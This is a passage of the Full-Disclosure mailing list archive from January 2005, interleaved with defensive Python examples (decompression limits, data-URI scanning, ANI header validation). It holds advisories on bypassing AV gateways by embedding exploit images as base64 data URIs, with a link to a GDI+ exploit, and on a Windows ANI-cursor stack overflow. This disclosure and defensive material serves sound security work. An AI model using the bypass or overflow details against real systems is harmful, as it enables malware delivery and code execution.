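        out += d.decompress(piece, max(budget, 1))
        if len(out) > max_out:
            raise DecompressionLimitExceeded(f"output would exceed {max_out} bytes")
        if len(out) > max_ratio * fed:
            raise DecompressionLimitExceeded(
                f"ratio {len(out) / fed:.0f}:1 after {fed} input bytes")
    out += d.flush()
    if len(out) > max_out:
        raise DecompressionLimitExceeded(f"output would exceed {max_out} bytes")
    return bytes(out)


def _blocked(data: bytes, max_out: int) -> bool:
    try:
        bounded_inflate(data, max_out=max_out)
    except DecompressionLimitExceeded:
        return True
    return False


def demo() -> dict:
    # Constructed inputs: 16 MiB of zeros deflates to a few KiB (a bomb), and
    # a log-like payload that compresses well but within honest ratios.
    bomb = zlib.compress(b"\x00" * (16 * 1024 * 1024), 9)
    log = b"".join(b"line %05d of the constructed sample log\n" % i
                   for i in range(10_000))
    result = {"bomb_compressed_bytes": len(bomb)}
    try:
        bounded_inflate(bomb, max_out=1 << 20)
        result["bomb_blocked"] = False
    except DecompressionLimitExceeded as exc:
        result["bomb_blocked"] = True
        result["bomb_reason"] = str(exc)
    result["log_roundtrip"] = bounded_inflate(zlib.compress(log), max_out=len(log)) == log
    result["exact_fit_ok"] = bounded_inflate(zlib.compress(b"hello"), max_out=5) == b"hello"
    result["small_overflow_blocked"] = _blocked(zlib.compress(b"hello world"), 5)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The ratio limit is a trade-off: genuinely repetitive data (a log full of identical lines) can exceed 100:1 legitimately, so the absolute cap is the one to size for the disk or memory actually available, and the ratio cap is an early tripwire.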

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Matt Ostiguy
On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]> wrote:
> Where are they?
> Mike
> 

My experience has been that the 2nd tuesday of the month patch drop
occurs late in the day or evening, Eastern Standard Time.

Matt


RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

2005-01-11 Thread Handy, Mark (IT)
It is Tuesday.

As mentioned before, mid-afternoon EST 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: 11 January 2005 11:11
To: Mike Diack
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
securitypatches today (11 Jan 2005)?

On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

--
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com



Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Vincent Archer
On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com



[Full-Disclosure] [ GLSA 200501-21 ] HylaFAX: hfaxd unauthorized login vulnerability

2005-01-11 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: HylaFAX: hfaxd unauthorized login vulnerability
  Date: January 11, 2005
  Bugs: #75941
ID: 200501-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

HylaFAX is subject to a vulnerability in its username matching code,
potentially allowing remote users to bypass access control lists.

Background
==

HylaFAX is a software package for sending and receiving facsimile
messages.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-misc/hylafax < 4.2.0-r2   >= 4.2.0-r2

Description
===

The code used by hfaxd to match a given username and hostname with an
entry in the hosts.hfaxd file is insufficiently protected against
malicious entries.

Impact
==

If the HylaFAX installation uses a weak hosts.hfaxd file, a remote
attacker could authenticate using a malicious username or hostname and
bypass the intended access restrictions.

Workaround
==

As a workaround, administrators may consider adding passwords to all
entries in the hosts.hfaxd file.

Resolution
==

All HylaFAX users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/hylafax-4.2.0-r2"

Note: Due to heightened security, weak entries in the hosts.hfaxd file
may no longer work. Please see the HylaFAX documentation for details of
accepted syntax in the hosts.hfaxd file.

References
==

  [ 1 ] CAN-2004-1182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1182
  [ 2 ] HylaFAX Announcement
http://marc.theaimsgroup.com/?l=hylafax&m=110545119911558&w=2

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-21.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0





Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Danny
On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]> wrote:
> Where are they?

They are probably patching their patch release system. :)

Expect them in a couple of hours. Patience grasshopper, patience...

...D


Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread vh
On Tue, 11 Jan 2005 15:13:45 -
"Mike Diack" <[EMAIL PROTECTED]> wrote:

> Where are they?
> Mike

Start using OpenSource-OSs then you would be able to write the patches
yourself if nobody cares for the security-holes.
Microsoft don't care for ANY guy who buys an MS-OS if this guy is no CEO
or any other person of any big company.

Don't count the patches...
Count the security holes they didn't patch.


vH




RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

2005-01-11 Thread Larry Seltzer
Tuesday, 1PM eastern



RE: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread James Patterson Wicks
It's just 8:55 on the West Coast.  Let Bill get a cup of coffee and
check his email first!  :)


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: Tuesday, January 11, 2005 11:11 AM
To: Mike Diack
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
security patches today (11 Jan 2005)?

On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com





RE: [Full-Disclosure] I thought Microsoft were releasing new secu rity patches today (11 Jan 2005)?

2005-01-11 Thread Randal, Phil
Looking at

 
http://www.microsoft.com/downloads/results.aspx?sortCriteria=date&freetext=security

should reveal all.

The Security Bulletins and KB articles aren't up yet, though.

Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of James Patterson Wicks
> Sent: 11 January 2005 16:56
> Cc: full-disclosure@lists.netsys.com
> Subject: RE: [Full-Disclosure] I thought Microsoft were 
> releasing new security patches today (11 Jan 2005)?
> 
> It's just 8:55 on the West Coast.  Let Bill get a cup of 
> coffee and check his email first!  :)
> 
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Vincent Archer
> Sent: Tuesday, January 11, 2005 11:11 AM
> To: Mike Diack
> Cc: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] I thought Microsoft were 
> releasing new security patches today (11 Jan 2005)?
> 
> On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> > Where are they?
> > Mike
> 
> Thursday usually, not tuesday?
> 
> --
> Vincent ARCHER
> [EMAIL PROTECTED]
> 
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com
> 


[Full-Disclosure] FW: MS Antispyware makes deal to leave Weatherbug alone

2005-01-11 Thread Todd Towles
 And the money payoff begins..

> -Original Message-
> From: jaynine [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, January 11, 2005 6:48 AM
> To: Patch Management Mailing List
> Subject: MS Antispyware makes deal to leave Weatherbug alone
> 
> I read this rather disturbing article on another tech list. 
> Pardon me if someone here has already made reference to it.
> 
> --- j9
> 
> http://netrn.net/spywareblog/archives/2005/01/07/adware-vs-microsoft/
> 
> 1/7/2005
> Adware vs. Microsoft
> 
> It's started folks. WeatherBug Miffed at Microsoft's Spyware 
> Classification .
> 
> Microsoft Corp.'s newly released anti-spyware is flagging a 
> component of AWS Convergence Technologies' WeatherBug 
> application as a threat to Windows users, prompting an 
> immediate complaint from the Gaithersburg, Md.-based company.
> 
> It appears this dispute has been resolved already: A 
> Microsoft spokeswoman said the beta product included a vendor 
> dispute-resolution mechanism to deal with complaints from 
> third-party companies.
> 
> In the case of WeatherBug, the dispute-resolution process 
> paid immediate dividends. On Friday, the company received a 
> response from Microsoft with the good news that the current 
> signatures for Minibug will be removed.
> 
> 
> 
> 
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread ASB
Yeah, because everyone is a kernel developer.


To answer the original question, the patches are released approx 1pm
EST on the 2nd Tuesday of each month.


-ASB
 FAST, CHEAP, SECURE: Pick Any TWO
 http://www.ultratech-llc.com/KB/



On Tue, 11 Jan 2005 17:38:09 +0100, vh <[EMAIL PROTECTED]> wrote:
> On Tue, 11 Jan 2005 15:13:45 -
> "Mike Diack" <[EMAIL PROTECTED]> wrote:
> 
> > Where are they?
> > Mike
> 
> Start using OpenSource-OSs, then you would be able to write the patches
> yourself if nobody cares for the security-holes.
> Microsoft don't care for ANY guy who buys an MS-OS if this guy is no CEO
> or any other person of any big company.
> 
> Don't count the patches...
> Count the security holes they didn't patch.
> 
> 
> vH
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Firespoofing [Firefox 1.0]

2005-01-11 Thread Andrew Clover
James Greenhalgh <[EMAIL PROTECTED]> wrote:
> It also doesn't work on non-Windows or with non-default colours.
Didn't work for Windows with default colours for me either; the real 
dialogue box jumped to the front. I am still on a nightly just before 
the 1.0 release though, and I believe it to be possible in theory. It 
could also, I think, be made to work without the 'browsing full screen' 
requirement.

> Really - this is more a window management thing surely?  If someone fell 
> for this, they'd deserve it to be honest.
It's window management, yeah, probably applicable to other browsers too, 
and not nearly as bad as the IE chromeless window stuff because you do 
get those extra couple of pixels of window edge to clue you in. But it's 
still not good.

The real solution is to force toolbar+menubar+address bar on for all 
JavaScript pop-ups, at least as a default option setting. This would 
also fix the recently publicised problem with targeting other sites' 
pop-up windows for phishing.

--
Andrew Clover
mailto:[EMAIL PROTECTED]
http://www.doxdesk.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread devis
Matt Ostiguy wrote:
> On Sat, 8 Jan 2005 10:12:23 -0600, RandallM <[EMAIL PROTECTED]> wrote:
> 
> > I don't think it's going to be free. While doing a small amount of research
> > on the "spyware community" I found this text string in the
> > GianttAntiSpywareUpdater.exe:
> 
> Doesn't the fact that the executable's name contains a company that no
> longer exists (Giant) indicate that perhaps this BETA software will
> undergo some changes before its full release as a Microsoft product?
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

Buahwuahwuahwuawa ... you have to be gullible to think that M$ will not 
NOT cash on their own slack coding. Of course they will, now I suspect 
they even will try to make it go as an added cost for the OEMs, so 
consumers will pay transparently for one year signatures updates ... as 
they do/did for OSes.
Remember .. they never had a choice in the first place, why would they now?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread James Patterson Wicks
The updates are scheduled to come out today. 

From Microsoft:
http://www.microsoft.com/technet/security/bulletin/advance.mspx


Microsoft Security Bulletin Advance Notification
On January 11, 2005, the Microsoft Security Response Center is
planning to release:

* 3 Microsoft Security Bulletins affecting Microsoft Windows. The
  greatest maximum severity rating for these security updates is
  Critical. These security updates may require a restart.


No additional details about bulletin severities or
vulnerabilities will be made available until January 11, 2005.


If you have Windows in your environment, you should subscribe to the
advanced notification service.  Helps you plan for downtime.






-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Matt
Ostiguy
Sent: Tuesday, January 11, 2005 11:07 AM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
security patches today (11 Jan 2005)?

On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]>
wrote:
> Where are they?
> Mike
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

My experience has been that the 2nd tuesday of the month patch drop
occurs late in the day or evening, Eastern Standard Time.

Matt
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Micheal Espinola Jr
Nope, it's typically the 2nd Tuesday of the month. Also, they are
PST.  Myself being EST, I don't expect to see anything until
mid-afternoon.

MS did pre-announce that there would be a release today.  You can
verify this on the web site.


On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <[EMAIL PROTECTED]> wrote:
> On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> > Where are they?
> > Mike
> 
> Thursday usually, not tuesday?
> 
> --
> Vincent ARCHER
> [EMAIL PROTECTED]
> 
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France
> www.denyall.com
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


-- 
ME2

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Jeff Gillian
Interesting. I tested a number of both Linux and Windows image
vulnerabilities that are all by default detected by my IronPort,
TippingPoint UnityOne and ISS Proventia appliances.

Using the technique you mentioned, they were ignored completely and delivered.
Additionally, there appear to be several mail clients that support
that RFC, including Thunderbird, so you can obviously target more than
just web browsers.

Jeff.


On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Multi-vendor AV gateway image inspection bypass vulnerability
> January 10, 2005
> 
> A vulnerability has been discovered which allows a remote attacker to
> bypass anti-virus (as well as other security technologies such as IDS
> and IPS) inspection of HTTP image content.
> 
> By leveraging techniques described in RFC 2397 for base64 encoding image
> content within the URL scheme, a remote attacker may encode a malicious
> image within the body of an HTML formatted document to circumvent
> content inspection.
> 
> For example:
> 
> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> 
> The source code at the URL above will by default create a JPEG image
> that will attempt (and fail without tweaking) to exploit the Microsoft
> MS04-028 GDI+ vulnerability. The image itself is detected by all AV
> gateway engines tested (Trend, Sophos and McAfee); however, when the
> same image is base64 encoded using the technique described in RFC 2397
> (documented below), inspection is not performed and the image is
> delivered and rendered by the client.
> 
> While Microsoft Internet Explorer does not support the RFC 2397 URL
> scheme, Firefox, Safari, Mozilla and Opera do and will render the data
> and thus successfully execute the payload if the necessary OS and/or
> application patches have not been applied.
> 
> ## BEGIN HTML ##
> 
> 
> 
> 
> 
> 
> ## END HTML ##
> 
> Solution:
> 
> While AV vendor patches are not yet available, fixes for all currently
> known image vulnerabilities are
> and have been for several months.  If you have not yet applied them,
> you have your own
> negligence to blame.
> 
> Contributions:
> 
> Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in
> platform testing.
> 
> Thank you,
> 
> Darren Bounds
> Intrusense, LLC.
> http://www.intrusense.com
> 
> - --
> Intrusense - Securing Business As Usual
> 
> ___
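
The bypass works because the gateway inspects the HTML as text and never decodes the embedded image. As an added example (not Intrusense's or any vendor's code), the Python below extracts RFC 2397 data: URIs from HTML, decodes them so the bytes can be handed to a scanner, and flags a declared media type that contradicts the content's magic bytes; the sample page is constructed inline, and its JPEG stub begins with the same 21 bytes the advisory's `/9j/4AAQSkZJRgABAQEAYABgAAD/` prefix decodes to.

```python
"""Added example, not the advisory's or any vendor's code: decode RFC 2397 data:
URIs embedded in HTML so the payload can be inspected, and flag a declared media
type that disagrees with the bytes actually carried."""
import base64
import binascii
import re
from urllib.parse import unquote_to_bytes

# RFC 2397 grammar: data:[<mediatype>][;base64],<data>
# Whitespace inside the data part is tolerated because mail and HTML wrap it.
DATA_URI_RE = re.compile(
    r"""data:(?P<mediatype>[^,;"']*)(?P<params>(?:;[^,"']*)*),(?P<data>[^"']*)""",
    re.IGNORECASE,
)

# Magic bytes for the image formats a gateway would normally fingerprint.
MAGIC = (
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"BM", "image/bmp"),
)


def sniff_type(payload: bytes) -> str:
    """Identify an image by its leading bytes, ignoring what the URI claims."""
    for magic, media_type in MAGIC:
        if payload.startswith(magic):
            return media_type
    return "application/octet-stream"


def decode_data_part(params: str, data: str) -> bytes:
    """Decode the <data> part: base64 when the ';base64' parameter is present,
    otherwise percent-encoded octets. Line-wrapped base64 is unwrapped first."""
    raw = re.sub(r"\s+", "", data)
    if ";base64" in params.lower():
        padded = raw + "=" * (-len(raw) % 4)  # tolerate dropped '=' padding
        try:
            return base64.b64decode(padded, validate=False)
        except (binascii.Error, ValueError):
            return b""
    return unquote_to_bytes(raw)


def extract_embedded_objects(html: str) -> list:
    """Return one record per data: URI found in html. A gateway would pass each
    record's 'payload' to its AV engine instead of scanning the HTML as text."""
    objects = []
    for m in DATA_URI_RE.finditer(html):
        declared = (m.group("mediatype") or "text/plain").lower()
        payload = decode_data_part(m.group("params"), m.group("data"))
        actual = sniff_type(payload)
        objects.append({
            "declared": declared,
            "actual": actual,
            "size": len(payload),
            # A recognised image type that contradicts the declared one is the
            # advisory's own case: a JPEG shipped as data:image/gif.
            "mismatch": actual != "application/octet-stream" and actual != declared,
            "payload": payload,
        })
    return objects


# Constructed sample payloads (headers only, not renderable images). The JPEG
# stub's first 21 bytes are what the advisory's "/9j/4AAQSkZJRgABAQEAYABgAAD/"
# prefix decodes to: a JFIF SOI marker followed by an APP0 segment.
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00\xff\xd9"
GIF_STUB = b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"


def build_sample_html() -> str:
    """Constructed page in the shape of the advisory's test HTML: an honest GIF
    and a JPEG declared as image/gif whose base64 is wrapped into short lines."""
    gif_b64 = base64.b64encode(GIF_STUB).decode()
    jpeg_b64 = base64.b64encode(JPEG_STUB).decode()
    wrapped = "\n".join(jpeg_b64[i:i + 28] for i in range(0, len(jpeg_b64), 28))
    return (
        "<html><body>\n"
        f'<img src="data:image/gif;base64,{gif_b64}">\n'
        f'<img src="data:image/gif;base64,{wrapped}">\n'
        "</body></html>\n"
    )


def scan_report(html: str) -> list:
    """One human-readable verdict line per embedded object."""
    lines = []
    for i, obj in enumerate(extract_embedded_objects(html), 1):
        verdict = "MISMATCH" if obj["mismatch"] else "types agree"
        lines.append(f"object {i}: declared {obj['declared']}, sniffed "
                     f"{obj['actual']}, {obj['size']} bytes: {verdict}")
    return lines


if __name__ == "__main__":
    print("\n".join(scan_report(build_sample_html())))
```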

[Full-Disclosure] EEYE: Windows ANI File Parsing Buffer Overflow

2005-01-11 Thread Derek Soeder
Windows ANI File Parsing Buffer Overflow

Systems Affected:
Windows Me
Windows 2000
Windows XP (SP1 and earlier)
Windows 2003

Overview:
eEye Digital Security has discovered a vulnerability in USER32.DLL's
handling of Windows animated cursor (.ani) files that will allow a
remote attacker to reliably overwrite the stack with arbitrary data and
execute arbitrary code.

Because Windows animated cursors can be supplied for use by Internet
Explorer, this vulnerability affects any applications that use the
Internet Explorer component internally, such as Internet Explorer
itself, Word, Excel, PowerPoint, Outlook, Outlook Express, and so on, as
well as the Windows shell.

In the case of Internet Explorer, the user's system will be compromised
when the user views a website that shows a malformed ANI file referenced
via a style sheet in the HTML file. Likewise, a system may be
compromised through Outlook and Outlook Express when the user tries to
read an HTML e-mail containing a MIME-encoded malformed ANI file and a
style sheet referencing the encoded ANI file, invoked using HTML such as
< BODY style="CURSOR: url('cid:')" >. In the case of the Windows
shell (explorer.exe), exploitation occurs when the user opens a folder
containing a malformed ANI file.

This vulnerability also exists in all obsolete versions of the Windows
operating system (Windows 95/98/NT4).

Technical Details:
The buffer overflow bug exists in a part of USER32.DLL involved in
handling ANI animated cursor files. A partial ANI file format is given
below:

"RIFF" {(DWORD)Length_of_file}
"ACON"
"LIST" {(DWORD)Length_of_list}
"INFO"
"INAM" {(DWORD)Length_of_title} {szTitle}
"IART" {(DWORD)Length_of_author} {szAuthor}
"anih" {(DWORD)Length_of_AnimationHeader} {AnimationHeaderBlock}

Generally, the length of AnimationHeaderBlock should be 36 bytes
(0x0024). The vulnerability is in the handling of the
Length_of_AnimationHeader field. This value will be passed as the length
argument of memcpy(), in order to copy the contents of
AnimationHeaderBlock, but the value is not checked appropriately. The
buffer intended to hold the AnimationHeaderBlock is located on the
stack, so we can overwrite the return address and exception handler on
the stack and jump into the buffer containing our code.

This vulnerability is a separate vulnerability from the ones discovered
by Xfocus.
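
As an added example (not eEye's or Microsoft's code), the Python below walks the RIFF/ACON chunk layout given above and applies the check the advisory says USER32.DLL skipped: an `anih` chunk's declared length must match the 36-byte animation header before its body is copied, and no chunk may declare more bytes than its container holds. The sample files are constructed inline; the ANIHEADER field names follow the commonly documented layout, which the advisory does not list.

```python
"""Added example, not eEye's or Microsoft's code: walk the RIFF/ACON chunk
layout from the advisory and refuse any 'anih' chunk whose declared length is
not the 36 bytes the animation header occupies, which is the check the
vulnerable USER32.DLL code path skipped before its memcpy()."""
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): nine little-endian DWORDs

# Field names follow the commonly documented ANIHEADER layout (an assumption;
# the advisory only gives the block's size).
ANIH_FIELDS = ("cbSize", "nFrames", "nSteps", "iWidth", "iHeight",
               "iBitCount", "nPlanes", "iDispRate", "bfAttributes")


class AniFormatError(ValueError):
    """Raised for any chunk that would read or copy outside its container."""


def iter_chunks(data: bytes, start: int, end: int):
    """Yield (fourcc, body) for each RIFF chunk in data[start:end]. A declared
    length that does not fit in the container is rejected before the body is
    touched, instead of being trusted as a copy length."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        (length,) = struct.unpack_from("<I", data, pos + 4)
        body_start = pos + 8
        if length > end - body_start:
            raise AniFormatError(
                f"chunk {fourcc!r} declares {length} bytes but only "
                f"{end - body_start} remain")
        yield fourcc, data[body_start:body_start + length]
        pos = body_start + length + (length & 1)  # chunks are WORD-aligned


def parse_ani(data: bytes) -> dict:
    """Parse the animation header and INFO list of an animated cursor file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        raise AniFormatError("not a RIFF/ACON file")
    (riff_len,) = struct.unpack_from("<I", data, 4)
    end = min(8 + riff_len, len(data))
    header, info = None, {}
    for fourcc, body in iter_chunks(data, 12, end):
        if fourcc == b"anih":
            # Length_of_AnimationHeader is attacker-controlled: fix the size
            # of what we accept rather than copying whatever is declared.
            if len(body) != ANIH_SIZE:
                raise AniFormatError(
                    f"anih length {len(body)}, expected {ANIH_SIZE}")
            header = dict(zip(ANIH_FIELDS, struct.unpack("<9I", body)))
        elif fourcc == b"LIST" and body[:4] == b"INFO":
            for sub, sub_body in iter_chunks(body, 4, len(body)):
                info[sub.decode("ascii", "replace")] = (
                    sub_body.split(b"\0", 1)[0].decode("ascii", "replace"))
    if header is None:
        raise AniFormatError("missing anih chunk")
    return {"header": header, "info": info}


def check_ani(data: bytes) -> str:
    """One-line verdict suitable for a mail or web gateway log."""
    try:
        parsed = parse_ani(data)
    except AniFormatError as exc:
        return f"rejected: {exc}"
    return (f"ok: {parsed['header']['nFrames']} frame(s), "
            f"title {parsed['info'].get('INAM', '')!r}")


# --- constructed samples -----------------------------------------------------

def chunk(fourcc: bytes, body: bytes) -> bytes:
    """Build one RIFF chunk, padding odd-length bodies as the format requires."""
    pad = b"\0" if len(body) & 1 else b""
    return fourcc + struct.pack("<I", len(body)) + body + pad


def build_ani(anih_body: bytes, title: bytes = b"demo cursor") -> bytes:
    """Wrap an anih body in a minimal RIFF/ACON container with an INFO list."""
    info_list = chunk(b"LIST", b"INFO" + chunk(b"INAM", title + b"\0"))
    payload = b"ACON" + info_list + chunk(b"anih", anih_body)
    return b"RIFF" + struct.pack("<I", len(payload)) + payload


# A well-formed header: exactly 36 bytes describing one 32x32 frame.
GOOD_HEADER = struct.pack("<9I", ANIH_SIZE, 1, 1, 32, 32, 32, 1, 10, 1)
# The advisory's shape of malformed file: an anih chunk far longer than 36 bytes.
OVERSIZED_HEADER = GOOD_HEADER + bytes(200)

if __name__ == "__main__":
    print(check_ani(build_ani(GOOD_HEADER)))
    print(check_ani(build_ani(OVERSIZED_HEADER)))
    print(check_ani(build_ani(GOOD_HEADER)[:-10]))  # truncated file
```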

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at: 
http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx

Credit:
Yuji Ukai

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/Products/Retina/download.html

Greetings:
eEye Geneva and UK guys, Retina Japanese edition team, [EMAIL PROTECTED] (hey
watzup!!) , Manma Kanrakuzaka - Okinawa Cuisine (Tomato salad tastes
good)

Copyright (c) 1998-2005 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] RE: I thought Microsoft were releasing new secu rity patches today (11 Jan 2005)?

2005-01-11 Thread Chris Brown
Da Plane, Da Plane.

http://www.microsoft.com/security/bulletins/200501_windows.mspx


Tuffer

"I could fly like an eagle but weasels don't get sucked into jet engines"



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

2005-01-11 Thread Handy, Mark (IT)
These are now out as MS05-001/2/3 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Micheal
Espinola Jr
Sent: 11 January 2005 12:20
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
securitypatches today (11 Jan 2005)?

Nope, it's typically the 2nd Tuesday of the month. Also, they are
PST.  Myself being EST, I don't expect to see anything until
mid-afternoon.

MS did pre-announce that there would be a release today.  You can verify
this on the web site.


On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <[EMAIL PROTECTED]>
wrote:
> On Tue, Jan 11, 2005 at 03:13:45PM -, Mike Diack wrote:
> > Where are they?
> > Mike
> 
> Thursday usually, not tuesday?
> 
> --
> Vincent ARCHER
> [EMAIL PROTECTED]
> 
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


--
ME2

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html 

 
NOTICE: If received in error, please destroy and notify sender.  Sender does 
not waive confidentiality or privilege, and use is prohibited. 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Danny
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
